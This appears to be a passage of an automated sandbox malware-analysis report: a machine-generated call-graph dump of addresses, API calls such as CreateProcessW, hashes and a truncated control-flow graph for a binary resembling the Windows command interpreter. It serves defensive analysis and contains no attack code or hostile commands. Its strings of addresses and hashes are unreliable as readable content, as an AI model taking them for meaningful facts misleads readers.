??_V@YAXPEAX 22156->22158 22157->22162 22164 7ff71966bd38 207 API calls 22157->22164 22161 7ff71966c87c 22158->22161 22159 7ff71967c6b8 SetConsoleTitleW 22159->22156 22160->22157 22160->22162 22165 7ff719678f80 7 API calls 22161->22165 22162->22140 22162->22141 22162->22146 22162->22147 22162->22148 22162->22149 22162->22152 22163 7ff71966c83d 22162->22163 22168 7ff71966c78a wcschr 22162->22168 22170 7ff71967291c 8 API calls 22162->22170 22172 7ff71966ca25 22162->22172 22174 7ff71967c684 22162->22174 22177 7ff71966ca2a 22162->22177 22179 7ff71966ca16 GetLastError 22162->22179 22315 7ff71966cb40 22163->22315 22164->22162 22167 7ff71966c88e 22165->22167 22167->22123 22168->22162 22170->22162 22171->22156 22171->22159 22175 7ff719663278 166 API calls 22172->22175 22176 7ff719663278 166 API calls 22174->22176 22175->22140 22176->22140 22178 7ff719679158 7 API calls 22177->22178 22178->22140 22181 7ff719663278 166 API calls 22179->22181 22181->22140 22183 7ff71966cd90 166 API calls 22182->22183 22184 7ff719675b12 22183->22184 22185 7ff71966cb40 166 API calls 22184->22185 22210 7ff719675b8b 22184->22210 22187 7ff719675b26 22185->22187 22186 7ff719678f80 7 API calls 22188 7ff71966bf99 22186->22188 22189 7ff719670a6c 273 API calls 22187->22189 22187->22210 22188->22123 22190 7ff719675b43 22189->22190 22191 7ff719675bb8 22190->22191 22192 7ff719675b48 GetConsoleTitleW 22190->22192 22193 7ff719675bbd GetConsoleTitleW 22191->22193 22194 7ff719675bf4 22191->22194 22195 7ff71966cad4 172 API calls 22192->22195 22196 7ff71966cad4 172 API calls 22193->22196 22197 7ff71967f452 22194->22197 22201 7ff719675bfd 22194->22201 22198 7ff719675b66 22195->22198 22200 7ff719675bdb 22196->22200 22199 7ff719673c24 166 API calls 22197->22199 22331 7ff719674224 InitializeProcThreadAttributeList 22198->22331 22199->22210 22391 7ff7196696e8 22200->22391 22203 7ff719675c1b 22201->22203 22204 7ff71967f462 22201->22204 22201->22210 22207 7ff719663278 166 API calls 22203->22207 22208 7ff719663278 166 API calls 22204->22208 22205 7ff719675b7f 22209 7ff719675c3c SetConsoleTitleW 22205->22209 22207->22210 22208->22210 22209->22210 22210->22186 22212 7ff71966c0c4 22211->22212 22213 7ff71966c01c 22211->22213 22212->22108 22214 7ff71966c086 22213->22214 22215 7ff71966c022 22213->22215 22219 7ff71966c144 22214->22219 22230 7ff71966c094 22214->22230 22216 7ff71966c113 22215->22216 22217 7ff71966c030 22215->22217 22228 7ff71966ff70 2 API calls 22216->22228 22232 7ff71966c053 22216->22232 22218 7ff71966c039 wcschr 22217->22218 22217->22232 22221 7ff71966c301 22218->22221 22218->22232 22220 7ff71966c151 22219->22220 22238 7ff71966c1c8 22219->22238 22597 7ff71966c460 22220->22597 22227 7ff71966cd90 166 API calls 22221->22227 22222 7ff71966c058 22233 7ff71966ff70 2 API calls 22222->22233 22236 7ff71966c073 22222->22236 22223 7ff71966c0c6 22226 7ff71966c0cf wcschr 22223->22226 22223->22236 22225 7ff71966c460 183 API calls 22225->22230 22231 7ff71966c1be 22226->22231 22226->22236 22248 7ff71966c30b 22227->22248 22228->22232 22230->22212 22230->22225 22234 7ff71966cd90 166 API calls 22231->22234 22232->22222 22232->22223 22240 7ff71966c211 22232->22240 22233->22236 22234->22238 22235 7ff71966c460 183 API calls 22235->22212 22236->22212 22237 7ff71966c460 183 API calls 22236->22237 22237->22236 22238->22212 22239 7ff71966c285 22238->22239 22238->22240 22245 7ff71966d840 178 API calls 22238->22245 22239->22240 22244 7ff71966b6b0 170 API calls 22239->22244 22243 7ff71966ff70 2 API calls 22240->22243 22241 7ff71966b6b0 170 API calls 22241->22232 22242 7ff71966d840 178 API calls 22242->22248 22243->22212 22246 7ff71966c2ac 22244->22246 22245->22238 22246->22236 22246->22240 22247 7ff71966c3d4 22247->22236 22247->22240 22247->22241 22248->22212 22248->22240 22248->22242 22248->22247 22250 7ff71966ca40 17 API calls 22249->22250 22265 7ff71966b162 22250->22265 22251 7ff71966b1d9 22256 7ff71966cd90 166 API calls 22251->22256 22273 7ff71966b1ed 22251->22273 22252 7ff71966b2f7 ??_V@YAXPEAX 22253 7ff71966b303 22252->22253 22255 7ff719678f80 7 API calls 22253->22255 22254 7ff719671ea0 8 API calls 22254->22265 22257 7ff71966b315 22255->22257 22256->22273 22257->22112 22257->22125 22259 7ff71966b228 _get_osfhandle 22261 7ff71966b23f _get_osfhandle 22259->22261 22259->22273 22260 7ff71967bfef _get_osfhandle SetFilePointer 22262 7ff71967c01d 22260->22262 22260->22273 22261->22273 22264 7ff7196733f0 _vsnwprintf 22262->22264 22267 7ff71967c038 22264->22267 22265->22251 22265->22254 22265->22265 22299 7ff71966b2e1 22265->22299 22266 7ff7196701b8 6 API calls 22266->22273 22272 7ff719663278 166 API calls 22267->22272 22268 7ff71967c1c3 22269 7ff7196733f0 _vsnwprintf 22268->22269 22269->22267 22270 7ff71966d208 _close 22270->22273 22271 7ff7196726e0 19 API calls 22271->22273 22275 7ff71967c1f9 22272->22275 22273->22259 22273->22260 22273->22266 22273->22268 22273->22270 22273->22271 22274 7ff71967c060 22273->22274 22276 7ff71967c246 22273->22276 22278 7ff71966b038 _dup2 22273->22278 22283 7ff71966b356 22273->22283 22273->22299 22308 7ff71967c1a5 22273->22308 22611 7ff71966affc _dup 22273->22611 22613 7ff71968f318 _get_osfhandle GetFileType 22273->22613 22274->22276 22280 7ff7196709f4 2 API calls 22274->22280 22277 7ff71966af98 2 API calls 22275->22277 22281 7ff71966af98 2 API calls 22276->22281 22277->22299 22278->22273 22279 7ff71966b038 _dup2 22282 7ff71967c1b7 22279->22282 22284 7ff71967c084 22280->22284 22285 7ff71967c24b 22281->22285 22286 7ff71967c1be 22282->22286 22287 7ff71967c207 22282->22287 22290 7ff71966af98 2 API calls 22283->22290 22288 7ff71966b900 166 API calls 22284->22288 22289 7ff71968f1d8 166 API calls 22285->22289 22291 7ff71966d208 _close 22286->22291 22293 7ff71966d208 _close 22287->22293 22292 7ff71967c08c 22288->22292 22289->22299 22294 7ff71967c211 22290->22294 22291->22268 22295 7ff71967c094 wcsrchr 22292->22295 22303 7ff71967c0ad 22292->22303 22293->22283 22296 7ff7196733f0 _vsnwprintf 22294->22296 22295->22303 22297 7ff71967c22c 22296->22297 22298 7ff719663278 166 API calls 22297->22298 22298->22299 22299->22252 22299->22253 22300 7ff71967c106 22301 7ff71966ff70 2 API calls 22300->22301 22304 7ff71967c13b 22301->22304 22302 7ff71967c0e0 _wcsnicmp 22302->22303 22303->22300 22303->22302 22304->22276 22305 7ff71967c146 SearchPathW 22304->22305 22305->22276 22306 7ff71967c188 22305->22306 22307 7ff7196726e0 19 API calls 22306->22307 22307->22308 22308->22279 22310 7ff719667279 22309->22310 22311 7ff719667211 _setjmp 22309->22311 22310->22127 22311->22310 22313 7ff719667265 22311->22313 22614 7ff7196672b0 22313->22614 22316 7ff71966cb63 22315->22316 22317 7ff71966cd90 166 API calls 22316->22317 22318 7ff71966c848 22317->22318 22318->22171 22319 7ff71966cad4 22318->22319 22320 7ff71966cad9 22319->22320 22321 7ff71966cb05 22319->22321 22320->22321 22322 7ff71966cd90 166 API calls 22320->22322 22321->22171 22323 7ff71967c722 22322->22323 22323->22321 22324 7ff71967c72e GetConsoleTitleW 22323->22324 22324->22321 22325 7ff71967c74a 22324->22325 22326 7ff71966b6b0 170 API calls 22325->22326 22330 7ff71967c778 22326->22330 22327 7ff71967c7ec 22328 7ff71966ff70 2 API calls 22327->22328 22328->22321 22329 7ff71967c7dd SetConsoleTitleW 22329->22327 22330->22327 22330->22329 22332 7ff7196742ab UpdateProcThreadAttribute 22331->22332 22333 7ff71967ecd4 GetLastError 22331->22333 22335 7ff7196742eb memset memset GetStartupInfoW 22332->22335 22336 7ff71967ecf0 GetLastError 22332->22336 22334 7ff71967ecee 22333->22334 22338 7ff719673a90 170 API calls 22335->22338 22428 7ff719689eec 22336->22428 22340 7ff7196743a8 22338->22340 22341 7ff71966b900 166 API calls 22340->22341 22342 7ff7196743bb 22341->22342 22343 7ff7196743cc 22342->22343 22344 7ff719674638 _local_unwind 22342->22344 22345 7ff7196743de wcsrchr 22343->22345 22346 7ff719674415 22343->22346 22344->22343 22345->22346 22347 7ff7196743f7 lstrcmpW 22345->22347 22415 7ff719675a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22346->22415 22347->22346 22349 7ff719674668 22347->22349 22416 7ff719689044 22349->22416 22350 7ff71967441a 22352 7ff71967442a CreateProcessW 22350->22352 22354 7ff719674596 CreateProcessAsUserW 22350->22354 22353 7ff71967448b 22352->22353 22355 7ff719674495 CloseHandle 22353->22355 22356 7ff719674672 GetLastError 22353->22356 22354->22353 22357 7ff71967498c 8 API calls 22355->22357 22360 7ff71967468d 22356->22360 22358 7ff7196744c5 22357->22358 22358->22360 22362 7ff7196744cd 22358->22362 22359 7ff7196747a3 22359->22205 22361 7ff71966cd90 166 API calls 22360->22361 22360->22362 22365 7ff719674724 22361->22365 22362->22359 22378 7ff71968a250 33 API calls 22362->22378 22381 7ff7196744f8 22362->22381 22363 7ff719675cb4 7 API calls 22366 7ff719674517 22363->22366 22364 7ff71967461c 22369 7ff71966ff70 GetProcessHeap RtlFreeHeap 22364->22369 22367 7ff71967472c _local_unwind 22365->22367 22375 7ff71967473d 22365->22375 22370 7ff7196733f0 _vsnwprintf 22366->22370 22367->22375 22368 7ff7196747e1 CloseHandle 22368->22364 22371 7ff7196747fa DeleteProcThreadAttributeList 22369->22371 22372 7ff719674544 22370->22372 22373 7ff719678f80 7 API calls 22371->22373 22374 7ff71967498c 8 API calls 22372->22374 22376 7ff719674820 22373->22376 22377 7ff719674558 22374->22377 22382 7ff71966ff70 GetProcessHeap RtlFreeHeap 22375->22382 22376->22205 22379 7ff7196747ae 22377->22379 22380 7ff719674564 22377->22380 22378->22381 22385 7ff7196733f0 _vsnwprintf 22379->22385 22384 7ff71967498c 8 API calls 22380->22384 22381->22359 22381->22363 22387 7ff719674612 22381->22387 22383 7ff71967475b _local_unwind 22382->22383 22383->22362 22386 7ff719674577 22384->22386 22385->22387 22386->22364 22388 7ff71967457f 22386->22388 22387->22364 22387->22368 22389 7ff71968a920 210 API calls 22388->22389 22390 7ff719674584 22389->22390 22390->22364 22393 7ff719669737 22391->22393 22394 7ff71966977d memset 22393->22394 22395 7ff71966cd90 166 API calls 22393->22395 22397 7ff71967b76e 22393->22397 22398 7ff71967b7b3 22393->22398 22400 7ff71966b364 17 API calls 22393->22400 22407 7ff71967b79a 22393->22407 22409 7ff7196696b4 186 API calls 22393->22409 22410 7ff71966986d 22393->22410 22430 7ff719671fac memset 22393->22430 22457 7ff71966ce10 22393->22457 22507 7ff719675920 22393->22507 22396 7ff71966ca40 17 API calls 22394->22396 22395->22393 22396->22393 22399 7ff719663278 166 API calls 22397->22399 22402 7ff71967b787 22399->22402 22400->22393 22401 7ff71967855c ??_V@YAXPEAX 22401->22398 22403 7ff71967b795 22402->22403 22405 7ff71968e944 393 API calls 22402->22405 22513 7ff719687694 22403->22513 22405->22403 22407->22401 22409->22393 22411 7ff71966988c 22410->22411 22412 7ff719669880 ??_V@YAXPEAX 22410->22412 22413 7ff719678f80 7 API calls 22411->22413 22412->22411 22414 7ff71966989d 22413->22414 22414->22205 22417 7ff719673a90 170 API calls 22416->22417 22418 7ff719689064 22417->22418 22419 7ff719689083 22418->22419 22420 7ff71968906e 22418->22420 22423 7ff71966cd90 166 API calls 22419->22423 22421 7ff71967498c 8 API calls 22420->22421 22422 7ff719689081 22421->22422 22422->22346 22424 7ff71968909b 22423->22424 22424->22422 22425 7ff71967498c 8 API calls 22424->22425 22426 7ff7196890ec 22425->22426 22427 7ff71966ff70 2 API calls 22426->22427 22427->22422 22429 7ff71967ed0a DeleteProcThreadAttributeList 22428->22429 22429->22334 22431 7ff71967203b 22430->22431 22432 7ff7196720b0 22431->22432 22433 7ff719672094 22431->22433 22434 7ff719673060 171 API calls 22432->22434 22435 7ff71967211c 22432->22435 22436 7ff719663278 166 API calls 22433->22436 22437 7ff7196720a6 22433->22437 22434->22435 22435->22437 22438 7ff719672e44 2 API calls 22435->22438 22436->22437 22439 7ff719678f80 7 API calls 22437->22439 22441 7ff719672148 22438->22441 22440 7ff719672325 22439->22440 22440->22393 22441->22437 22442 7ff719672d70 3 API calls 22441->22442 22443 7ff7196721af 22442->22443 22444 7ff71966b900 166 API calls 22443->22444 22446 7ff7196721d0 22444->22446 22445 7ff71967e04a ??_V@YAXPEAX 22445->22437 22446->22445 22447 7ff71967221c wcsspn 22446->22447 22456 7ff7196722a4 ??_V@YAXPEAX 22446->22456 22449 7ff71966b900 166 API calls 22447->22449 22450 7ff71967223b 22449->22450 22450->22445 22454 7ff719672252 22450->22454 22451 7ff71967228f 22452 7ff71966d3f0 223 API calls 22451->22452 22452->22456 22453 7ff71967e06d wcschr 22453->22454 22454->22451 22454->22453 22455 7ff71967e090 towupper 22454->22455 22455->22451 22455->22454 22456->22437 22495 7ff71966d0f8 22457->22495 22502 7ff71966ce5b 22457->22502 22458 7ff719678f80 7 API calls 22461 7ff71966d10a 22458->22461 22459 7ff71967c860 22460 7ff71967c97c 22459->22460 22464 7ff71968ee88 390 API calls 22459->22464 22463 7ff71968e9b4 197 API calls 22460->22463 22461->22393 22462 7ff719670494 182 API calls 22462->22502 22465 7ff71967c981 longjmp 22463->22465 22466 7ff71967c879 22464->22466 22467 7ff71967c99a 22465->22467 22468 7ff71967c95c 22466->22468 22469 7ff71967c882 EnterCriticalSection LeaveCriticalSection 22466->22469 22471 7ff71967c9b3 ??_V@YAXPEAX 22467->22471 22467->22495 22468->22460 22472 7ff7196696b4 186 API calls 22468->22472 22474 7ff71966d0e3 22469->22474 22471->22495 22472->22468 22473 7ff71966ceaa _tell 22475 7ff71966d208 _close 22473->22475 22474->22393 22475->22502 22476 7ff71966cd90 166 API calls 22476->22502 22477 7ff71967c9d5 22478 7ff71968d610 167 API calls 22477->22478 22480 7ff71967c9da 22478->22480 22479 7ff71966b900 166 API calls 22479->22502 22481 7ff71967ca07 22480->22481 22483 7ff71968bfec 176 API calls 22480->22483 22482 7ff71968e91c 198 API calls 22481->22482 22487 7ff71967ca0c 22482->22487 22484 7ff71967c9f1 22483->22484 22486 7ff719663240 166 API calls 22484->22486 22485 7ff71966cf33 memset 22485->22502 22486->22481 22487->22393 22488 7ff71966ca40 17 API calls 22488->22502 22489 7ff71966d184 wcschr 22489->22502 22490 7ff71968bfec 176 API calls 22490->22502 22491 7ff71967c9c9 22493 7ff71967855c ??_V@YAXPEAX 22491->22493 22492 7ff71966d1a7 wcschr 22492->22502 22493->22495 22494 7ff71968778c 166 API calls 22494->22502 22495->22458 22496 7ff719670a6c 273 API calls 22496->22502 22497 7ff71966be00 635 API calls 22497->22502 22498 7ff719673448 166 API calls 22498->22502 22499 7ff719670580 12 API calls 22501 7ff71966d003 GetConsoleOutputCP GetCPInfo 22499->22501 22500 7ff71966cfab _wcsicmp 22500->22502 22503 7ff7196704f4 3 API calls 22501->22503 22502->22459 22502->22462 22502->22467 22502->22474 22502->22476 22502->22477 22502->22479 22502->22485 22502->22488 22502->22489 22502->22490 22502->22491 22502->22492 22502->22494 22502->22495 22502->22496 22502->22497 22502->22498 22502->22499 22502->22500 22505 7ff719671fac 238 API calls 22502->22505 22506 7ff71966d044 ??_V@YAXPEAX 22502->22506 22519 7ff71966df60 22502->22519 22539 7ff71968c738 22502->22539 22503->22502 22505->22502 22506->22502 22508 7ff71967596c 22507->22508 22509 7ff719675a12 22507->22509 22508->22509 22510 7ff71967598d VirtualQuery 22508->22510 22509->22393 22510->22509 22512 7ff7196759ad 22510->22512 22511 7ff7196759b7 VirtualQuery 22511->22509 22511->22512 22512->22509 22512->22511 22514 7ff7196876a3 22513->22514 22515 7ff7196876b7 22514->22515 22516 7ff7196696b4 186 API calls 22514->22516 22517 7ff71968e9b4 197 API calls 22515->22517 22516->22514 22518 7ff7196876bc longjmp 22517->22518 22520 7ff71966df93 22519->22520 22521 7ff71966dfe2 22519->22521 22520->22521 22522 7ff71966df9f GetProcessHeap RtlFreeHeap 22520->22522 22523 7ff71966e100 VirtualFree 22521->22523 22524 7ff71966e00b _setjmp 22521->22524 22522->22520 22522->22521 22523->22521 22525 7ff71966e04a 22524->22525 22533 7ff71966e0c3 22524->22533 22526 7ff71966e600 473 API calls 22525->22526 22527 7ff71966e073 22526->22527 22528 7ff71966e081 22527->22528 22529 7ff71966e0e0 longjmp 22527->22529 22531 7ff71966d250 475 API calls 22528->22531 22530 7ff71966e0b0 22529->22530 22530->22533 22549 7ff71968d3fc 22530->22549 22532 7ff71966e086 22531->22532 22532->22530 22536 7ff71966e600 473 API calls 22532->22536 22533->22473 22537 7ff71966e0a7 22536->22537 22537->22530 22538 7ff71968d610 167 API calls 22537->22538 22538->22530 22540 7ff71968c775 22539->22540 22541 7ff71968c7ab 22539->22541 22542 7ff71966cd90 166 API calls 22540->22542 22543 7ff71968c781 22541->22543 22544 7ff71968c8d4 22541->22544 22546 7ff71966b6b0 170 API calls 22541->22546 22547 7ff71966b038 _dup2 22541->22547 22548 7ff71966d208 _close 22541->22548 22542->22543 22543->22544 22545 7ff71966b0d8 194 API calls 22543->22545 22544->22502 22545->22544 22546->22541 22547->22541 22548->22541 22560 7ff71968d419 22549->22560 22550 7ff71967cadf 22551 7ff719673448 166 API calls 22551->22560 22552 7ff71968d592 22554 7ff719673448 166 API calls 22552->22554 22553 7ff71968d5c4 22555 7ff719673448 166 API calls 22553->22555 22557 7ff71968d5a5 22554->22557 22555->22550 22559 7ff71968d5ba 22557->22559 22563 7ff719673448 166 API calls 22557->22563 22558 7ff71968d546 22558->22553 22561 7ff71968d555 22558->22561 22567 7ff71968d36c 22559->22567 22560->22550 22560->22551 22560->22552 22560->22553 22560->22561 22562 7ff71968d541 22560->22562 22565 7ff71968d3fc 166 API calls 22560->22565 22574 7ff71968d31c 22561->22574 22562->22552 22562->22553 22562->22558 22566 7ff71968d589 22562->22566 22563->22559 22565->22560 22566->22552 22566->22561 22568 7ff71968d381 22567->22568 22569 7ff71968d3d8 22567->22569 22570 7ff7196734a0 166 API calls 22568->22570 22573 7ff71968d390 22570->22573 22571 7ff719673448 166 API calls 22571->22573 22572 7ff7196734a0 166 API calls 22572->22573 22573->22569 22573->22571 22573->22572 22573->22573 22575 7ff719673448 166 API calls 22574->22575 22576 7ff71968d33b 22575->22576 22577 7ff71968d36c 166 API calls 22576->22577 22578 7ff71968d343 22577->22578 22579 7ff71968d3fc 166 API calls 22578->22579 22585 7ff71968d34e 22579->22585 22580 7ff719673448 166 API calls 22580->22585 22581 7ff71968d592 22583 7ff719673448 166 API calls 22581->22583 22582 7ff71968d5c4 22584 7ff719673448 166 API calls 22582->22584 22587 7ff71968d5a5 22583->22587 22595 7ff71968d5c2 22584->22595 22585->22580 22585->22581 22585->22582 22588 7ff71968d541 22585->22588 22593 7ff71968d555 22585->22593 22585->22595 22596 7ff71968d3fc 166 API calls 22585->22596 22586 7ff71968d31c 166 API calls 22586->22595 22589 7ff71968d5ba 22587->22589 22591 7ff719673448 166 API calls 22587->22591 22588->22581 22588->22582 22590 7ff71968d546 22588->22590 22594 7ff71968d589 22588->22594 22592 7ff71968d36c 166 API calls 22589->22592 22590->22582 22590->22593 22591->22589 22592->22595 22593->22586 22594->22581 22594->22593 22595->22550 22596->22585 22598 7ff71966c4c9 22597->22598 22599 7ff71966c486 22597->22599 22602 7ff71966ff70 2 API calls 22598->22602 22604 7ff71966c161 22598->22604 22600 7ff71966c48e wcschr 22599->22600 22599->22604 22601 7ff71966c4ef 22600->22601 22600->22604 22603 7ff71966cd90 166 API calls 22601->22603 22602->22604 22610 7ff71966c4f9 22603->22610 22604->22212 22604->22235 22605 7ff71966c5bd 22606 7ff71966c541 22605->22606 22609 7ff71966b6b0 170 API calls 22605->22609 22606->22604 22608 7ff71966ff70 2 API calls 22606->22608 22607 7ff71966d840 178 API calls 22607->22610 22608->22604 22609->22606 22610->22604 22610->22605 22610->22606 22610->22607 22612 7ff71966b018 22611->22612 22612->22273 22613->22273 22615 7ff7196672de 22614->22615 22616 7ff719684621 22614->22616 22617 7ff7196672eb 22615->22617 22625 7ff719684467 22615->22625 22626 7ff719684530 22615->22626 22618 7ff7196847e0 22616->22618 22621 7ff71968447b longjmp 22616->22621 22622 7ff719684639 22616->22622 22645 7ff71968475e 22616->22645 22675 7ff719667348 22617->22675 22620 7ff719667348 168 API calls 22618->22620 22673 7ff719684524 22620->22673 22623 7ff719684492 22621->22623 22627 7ff719684695 22622->22627 22643 7ff71968463e 22622->22643 22628 7ff719667348 168 API calls 22623->22628 22625->22617 22625->22623 22636 7ff719684475 22625->22636 22629 7ff719667348 168 API calls 22626->22629 22635 7ff7196673d4 168 API calls 22627->22635 22637 7ff7196844a8 22628->22637 22652 7ff719684549 22629->22652 22630 7ff719667315 22690 7ff7196673d4 22630->22690 22631 7ff719667348 168 API calls 22631->22618 22632 7ff719667348 168 API calls 22632->22630 22633 7ff7196672b0 168 API calls 22639 7ff71968480e 22633->22639 22653 7ff71968469a 22635->22653 22636->22621 22636->22627 22648 7ff7196844e2 22637->22648 22656 7ff719667348 168 API calls 22637->22656 22638 7ff7196845b2 22641 7ff719667348 168 API calls 22638->22641 22639->22310 22640 7ff719667323 22640->22310 22647 7ff7196845c7 22641->22647 22642 7ff719684654 22649 7ff719667348 168 API calls 22642->22649 22643->22621 22643->22642 22644 7ff71968455e 22644->22638 22654 7ff719667348 168 API calls 22644->22654 22645->22631 22646 7ff7196846e1 22650 7ff7196672b0 168 API calls 22646->22650 22655 7ff719667348 168 API calls 22647->22655 22657 7ff7196672b0 168 API calls 22648->22657 22649->22640 22651 7ff719684738 22650->22651 22658 7ff719667348 168 API calls 22651->22658 22652->22638 22652->22644 22661 7ff719667348 168 API calls 22652->22661 22653->22646 22664 7ff7196846ea 22653->22664 22665 7ff7196846c7 22653->22665 22654->22638 22659 7ff7196845db 22655->22659 22656->22648 22660 7ff7196844f1 22657->22660 22658->22673 22662 7ff719667348 168 API calls 22659->22662 22663 7ff7196672b0 168 API calls 22660->22663 22661->22644 22666 7ff7196845ec 22662->22666 22667 7ff719684503 22663->22667 22668 7ff719667348 168 API calls 22664->22668 22665->22646 22671 7ff719667348 168 API calls 22665->22671 22669 7ff719667348 168 API calls 22666->22669 22667->22640 22670 7ff719667348 168 API calls 22667->22670 22668->22646 22672 7ff719684600 22669->22672 22670->22673 22671->22646 22674 7ff719667348 168 API calls 22672->22674 22673->22633 22673->22640 22674->22673 22682 7ff71966735d 22675->22682 22676 7ff719663278 166 API calls 22677 7ff719684820 longjmp 22676->22677 22678 7ff719684838 22677->22678 22679 7ff719663278 166 API calls 22678->22679 22680 7ff719684844 longjmp 22679->22680 22681 7ff71968485a 22680->22681 22683 7ff719667348 166 API calls 22681->22683 22682->22676 22682->22678 22682->22682 22689 7ff7196673ab 22682->22689 22684 7ff71968487b 22683->22684 22685 7ff719667348 166 API calls 22684->22685 22686 7ff7196848ad 22685->22686 22687 7ff719667348 166 API calls 22686->22687 22688 7ff7196672ff 22687->22688 22688->22630 22688->22632 22691 7ff719667401 22690->22691 22691->22640 22692 7ff719667348 168 API calls 22691->22692 22693 7ff71968487b 22692->22693 22694 7ff719667348 168 API calls 22693->22694 22695 7ff7196848ad 22694->22695 22696 7ff719667348 168 API calls 22695->22696 22697 7ff7196848be 22696->22697 22697->22640
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                    • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                    • API String ID: 3305344409-4288247545
                                                                    • Opcode ID: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                                    • Instruction ID: bed9b7f3833799fcd5bb45729dd33067bf2f5524599defca2c870c32568121fb
                                                                    • Opcode Fuzzy Hash: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                                    • Instruction Fuzzy Hash: 4E429425A08E82C5EA58AF1198102B9A7B3BF85BBCF854535D91E4B7D4DF3CE54E8330

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 7ff71966aa54-7ff71966aa98 call 7ff71966cd90 219 7ff71966aa9e 216->219 220 7ff71967bf5a-7ff71967bf70 call 7ff719674c1c call 7ff71966ff70 216->220 221 7ff71966aaa5-7ff71966aaa8 219->221 223 7ff71966acde-7ff71966ad00 221->223 224 7ff71966aaae-7ff71966aac8 wcschr 221->224 229 7ff71966ad06 223->229 224->223 226 7ff71966aace-7ff71966aae9 towlower 224->226 226->223 228 7ff71966aaef-7ff71966aaf3 226->228 231 7ff71966aaf9-7ff71966aafd 228->231 232 7ff71967beb7-7ff71967bec4 call 7ff71968eaf0 228->232 233 7ff71966ad0d-7ff71966ad1f 229->233 235 7ff71966ab03-7ff71966ab07 231->235 236 7ff71967bbcf 231->236 248 7ff71967bec6-7ff71967bed8 call 7ff719663240 232->248 249 7ff71967bf43-7ff71967bf59 call 7ff719674c1c 232->249 237 7ff71966ad22-7ff71966ad2a call 7ff7196713e0 233->237 239 7ff71966ab7d-7ff71966ab81 235->239 240 7ff71966ab09-7ff71966ab0d 235->240 243 7ff71967bbde 236->243 237->221 244 7ff71966ab87-7ff71966ab95 239->244 245 7ff71967be63 239->245 240->245 246 7ff71966ab13-7ff71966ab17 240->246 255 7ff71967bbea-7ff71967bbec 243->255 251 7ff71966ab98-7ff71966aba0 244->251 258 7ff71967be72-7ff71967be88 call 7ff719663278 call 7ff719674c1c 245->258 246->239 252 7ff71966ab19-7ff71966ab1d 246->252 248->249 263 7ff71967beda-7ff71967bee9 call 7ff719663240 248->263 249->220 251->251 256 7ff71966aba2-7ff71966abb3 call 7ff71966cd90 251->256 252->243 257 7ff71966ab23-7ff71966ab27 252->257 265 7ff71967bbf8-7ff71967bc01 255->265 256->220 270 7ff71966abb9-7ff71966abde call 7ff7196713e0 call 7ff7196733a8 256->270 257->255 261 7ff71966ab2d-7ff71966ab31 257->261 279 7ff71967be89-7ff71967be8c 258->279 261->229 267 7ff71966ab37-7ff71966ab3b 261->267 273 7ff71967beeb-7ff71967bef1 263->273 274 7ff71967bef3-7ff71967bef9 263->274 265->233 267->265 271 7ff71966ab41-7ff71966ab45 267->271 308 7ff71966ac75 270->308 309 7ff71966abe4-7ff71966abe7 270->309 276 7ff71966ab4b-7ff71966ab4f 271->276 277 7ff71967bc06-7ff71967bc2a call 7ff7196713e0 271->277 273->249 273->274 274->249 280 7ff71967befb-7ff71967bf0d call 7ff719663240 274->280 283 7ff71966ab55-7ff71966ab78 call 7ff7196713e0 276->283 284 7ff71966ad2f-7ff71966ad33 276->284 297 7ff71967bc2c-7ff71967bc4c _wcsnicmp 277->297 298 7ff71967bc5a-7ff71967bc61 277->298 285 7ff71966acbe 279->285 286 7ff71967be92-7ff71967beaa call 7ff719663278 call 7ff719674c1c 279->286 280->249 306 7ff71967bf0f-7ff71967bf21 call 7ff719663240 280->306 283->221 290 7ff71966ad39-7ff71966ad3d 284->290 291 7ff71967bc66-7ff71967bc8a call 7ff7196713e0 284->291 293 7ff71966acc0-7ff71966acc7 285->293 337 7ff71967beab-7ff71967beb6 call 7ff719674c1c 286->337 300 7ff71967bcde-7ff71967bd02 call 7ff7196713e0 290->300 301 7ff71966ad43-7ff71966ad49 290->301 314 7ff71967bc8c-7ff71967bcaa _wcsnicmp 291->314 315 7ff71967bcc4-7ff71967bcdc 291->315 293->293 303 7ff71966acc9-7ff71966acda 293->303 297->298 307 7ff71967bc4e-7ff71967bc55 297->307 312 7ff71967bd31-7ff71967bd4f _wcsnicmp 298->312 329 7ff71967bd2a 300->329 330 7ff71967bd04-7ff71967bd24 _wcsnicmp 300->330 310 7ff71967bd5e-7ff71967bd65 301->310 311 7ff71966ad4f-7ff71966ad68 301->311 303->223 306->249 339 7ff71967bf23-7ff71967bf35 call 7ff719663240 306->339 322 7ff71967bbb3-7ff71967bbb7 307->322 319 7ff71966ac77-7ff71966ac7f 308->319 309->285 324 7ff71966abed-7ff71966ac0b call 7ff71966cd90 * 2 309->324 310->311 323 7ff71967bd6b-7ff71967bd73 310->323 325 7ff71966ad6d-7ff71966ad70 311->325 326 7ff71966ad6a 311->326 320 7ff71967bd55 312->320 321 7ff71967bbc2-7ff71967bbca 312->321 314->315 327 